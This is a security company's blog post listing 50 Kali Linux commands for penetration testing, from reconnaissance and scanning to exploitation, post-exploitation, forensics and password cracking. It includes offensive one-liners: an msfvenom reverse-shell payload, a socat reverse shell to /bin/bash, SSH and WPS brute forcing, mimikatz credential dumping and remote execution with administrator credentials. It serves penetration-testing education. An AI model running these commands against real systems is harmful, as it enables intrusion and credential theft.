Tools

Top 50 Kali Linux Commands for Pentesters: Essential Tools

Published  ·  9 min read

You have Kali Linux installed. You know the basics. But when you are in the middle of a penetration test, you need the right command at the right time. You cannot waste time searching through man pages or scrolling through Google.

Following are the Top 50 Kali Linux commands that every pentester must be aware of, categorized for instant access.

LEGAL WARNING

This guide is for educational purposes and authorized testing only.
Using these commands on systems you do not own or have explicit written permission to test is illegal. These commands are for use in legitimate security assessments, CTF competitions, and your own lab environments.

YOU HAVE BEEN WARNED.

Reconnaissance Commands

Reconnaissance is the first phase of any penetration test. These commands help you gather information about your target.

The most crucial reconnaissance tool is nmap. It locates hosts, open ports, and services that are currently running. To scan all ports while performing version detection, use the following command:
nmap -sV -p- 192.168.1.1

netdiscover scans for live hosts within your local network using ARP requests. Use the following command to scan a certain subnet:
netdiscover -r 192.168.1.0/24

arp-scan scans the local network with ARP requests.
To scan your local network, use the following command:
arp-scan --local

whois queries the registry for information regarding domain ownership. Run whois example.com to query the domain owner.

dig is an internet protocol that can be used to query DNS records. Run dig example.com A to query for an A record of the domain.

nslookup is another internet protocol used to query DNS information. Run nslookup example.com to query DNS information.

dnsenum queries for DNS enumeration from a domain. Use the command dnsenum example.com.

Fierce is a tool that performs DNS reconnaissance to enumerate subdomains. To use fierce, run fierce –dns example.com to enumerate subdomains.

Theharvester is used to enumerate emails, subdomains, and employees. You need to use theharvester -d example.com -b google in order to perform theharvester operation.

Host is a command line utility for DNS queries. You can use host example.com for DNS queries.

Network Scanning Commands

Once you know your target, you need to scan the network in more detail.

masscan is a fast port scanner that can scan the entire internet. The command masscan 192.168.1.0/24 -p 1-10000 scans a range of ports quickly.

scanless uses online port scanners without exposing your IP. Run scanless -s example.com to scan from multiple online sources.

nbtscan scans for NetBIOS name servers. nbtscan 192.168.1.0/24 should be used to detect Windows-based machines on the network.

smbclient can be described as an SMB/CIFS client used to access Windows shares. The command smbclient -L 192.168.1.1 

enum4linux is an enumeration tool for Windows and SMB systems. Run enum4linux 192.168.1.1 to gather information about a Windows target.

Vulnerability Scanning Commands

After mapping the network, you need to find vulnerabilities.

nikto is a web server vulnerability scanner. Use nikto -h http://example.com to scan a web server.

wpscan is used for scanning the vulnerabilities of a WordPress website. To do so, use the command wpscan --url http://example.com.

sqlmap is used to automate SQL Injection testing and exploitation. The command for that purpose is sqlmap -u "http://example.com/page?id=1".

xsstrike is an extended tool for XSS (Cross-site Scripting) testing and exploitation. You can run xsstrike -u "http://example.com/page?id=1".

openvas is an open-source vulnerability scanning tool. To run openvas, use the command openvas --target 192.168.1.1 to scan a target.

Nmap –script executes Nmap scripts to discover vulnerabilities. The command nmap –script vuln 192.168.1.1 will execute the vulnerability scripts.

Searchsploit is a tool to search for exploits from Exploit-DB. The command searchsploit apache 2.4 will search for exploits on Apache 2 version 2.4.

Exploitation Commands

Once you find a vulnerability, you need to exploit it.

msfconsole is the Metasploit Framework console. Run msfconsole to start the Metasploit interactive console.

Msfvenom produces the payload that can be used in Metasploit. To produce the reverse shell payload for Windows, run the command msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f exe -o payload.exe

ExploitDB provides the searches and exploitation of public exploits. Searchsploit -m 12345 will provide you with exploit 12345.

BeEF stands for Browser Exploitation Framework. Use beef-xss to start the BeEF framework.

setoolkit is the Social-Engineer Toolkit for phishing attacks. Run setoolkit to launch phishing and social engineering attacks.

hydra is a brute force authentication tool. The command: hydra -l admin -P passwords.txt ssh://192.168.1.1 is used to crack SSH passwords.

john represents John the Ripper and is utilized in cracking of the password hashes. Run this command: john --wordlist=passwords.txt hashes.txt.

hashcat is a tool that uses GPU to recover the password hashes. Run this command: hashcat -m 0 -a 0 hashes.txt passwords.txt.

aircrack-ng is a tool used in assessing the Wi-Fi security. Run this command: aircrack-ng capture.cap -w passwords.txt to crack WPA passwords.

reaver brute forces WPS PINs. Run reaver -i wlan0mon -b BSSID -c channel -vv to brute force a WPS PIN.

bully is an alternative WPS brute force tool. Use bully -b BSSID -c channel wlan0mon to brute force WPS.

Post-Exploitation Commands

Once you have gained access, then you must maintain that access.

mimikatz gets Windows Credentials. In the meterpreter session, use load kiwi and creds_all to get credentials.

powershell is the command-line shell for Windows. Use powershell -c "Get-Process" to execute PowerShell commands on remote hosts.

nc(netcat) is the Swiss army knife of networking. The command nc -lvnp 4444 creates a listener for inbound connection

socat is an improved version of netcat. Use socat TCP4:192.168.1.1:4444 EXEC:/bin/bash to establish a reverse shell.

psexec executes remote processes on Windows. Use psexec \\192.168.1.1 -u Administrator -p password cmd.exe to execute commands remotely.

wmiexec provides WMI-based remote command execution. Use wmiexec.py DOMAIN/Administrator:[email protected] to execute commands via WMI.

smbexec provides SMB-based remote command execution. Run smbexec.py DOMAIN/Administrator:[email protected] to execute commands via SMB.

Forensics Commands

After the test, you may need to analyze files and systems.

binwalk extracts embedded files from binaries. Use binwalk firmware.bin to find hidden files in firmware images.

foremost is used to recover deleted files through the command "foremost -i drive.img".

Strings tool extracts printable strings from binary files and can be used by running strings on binary.exe.

Exiftool is used to extract metadata from files and can be run on image.jpg.

Pdfid analyses PDF files for any suspicious code and is run using pdfid suspicious.pdf to identify suspicious elements in a PDF.

autopsy is a GUI-based forensic analysis tool. Run autopsy to start the forensic analysis interface.

Password Attack Commands

These commands help you crack passwords and create wordlists.

crunch generates wordlists for password cracking. crunch 8 8 abc123 > wordlist.txt will generate the wordlist with 8-character passwords.

cewl creates custom wordlist based on web pages. Command to create wordlist using cewl is cewl http://example.com -o -w wordlist.txt.

hashid recognizes hash algorithms. hashid hash.txt will help in identifying the type of hash.

hcxdumptool captures WPA handshakes for cracking. The command is hcxdumptool -i wlan0mon -o capture.pcap to capture handshakes.

Quick Reference

For reconnaissance, use nmap, netdiscover, and theHarvester. For network scanning, use masscan, enum4linux, and smbclient. The vulnerability assessment tools are: nikto, sqlmap and searchsploit. The exploitation tools are: msfconsole, hydra and john. The post-exploitation tools are: nc, psexec and mimikatz. The forensic tools are: binwalk, strings and exiftool. The password attacks tools are: crunch, cewl and hashcat.

The Bottom Line

These 50 commands cover the most common tasks in penetration testing. They will save you time and make you more effective.

Begin by performing reconnaissance commands to obtain intelligence.Use scans for finding targets. Run vulnerability scans to find vulnerabilities. Exploit those vulnerabilities with the help of Metasploit and other techniques. Persist by conducting post-exploitation operations. Exfiltrate valuable information using forensic techniques.

Perform the above-mentioned commands in your lab environment. The more you practice, the better you will become.

Join The Community

In case you are facing problems with the above mentioned commands or if you have any queries related to pen testing methods, you can head to the Red Secure Tech Ethical Hacking & Pen-Testing community forum.

Red Secure Tech Ethical Hacking & Pen-Testing community forum is a forum that consists of experts who discuss different tools and methods used for ethical hacking and pen-testing.

Access forum at: https://www.redsecuretech.co.uk/forum/category/ethical-hacking-pentesting

Ask questions. Share knowledge. Learn from others.

FAQ Section

Which Kali Linux command is the most critical for pentesters?

The nmap command is certainly the most critical command that can be used for discovering networks and performing port and service scans.

What is the proper method of learning these commands?

The best method to learn these commands would be by experimenting in a laboratory. You can configure VMs which can be exploited easily and then run the command to see how it works.

How is nmap different from masscan?

nmap is the general purpose network scanning software which has many features, such as the capability for OS detection, version detection, and scripting, among others. Masscan is another software which is specifically meant to do its job faster. The drawback of the latter software is that it cannot compete with nmap in terms of its functional features.

How can I make the reverse shell payload using msfvenom?

The command I am going to use here will be msfvenom –p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f exe –o payload.exe. This command will help me create the executable file that will connect to the listener.

What is the difference between hydra and john?

hydra is a network authentication brute force tool. It tries passwords against services like SSH, FTP, and HTTP. john (John the Ripper) is a local password cracker. It cracks password hashes that you have already obtained from a system

Professional Services

Explore Our Cybersecurity Services

Our insights are backed by hands-on service delivery. If your business needs professional cybersecurity support, our UK-based specialists are ready to help.

© 2016 – 2026 Red Secure Tech Ltd. Registered in England and Wales — Company No: 15581067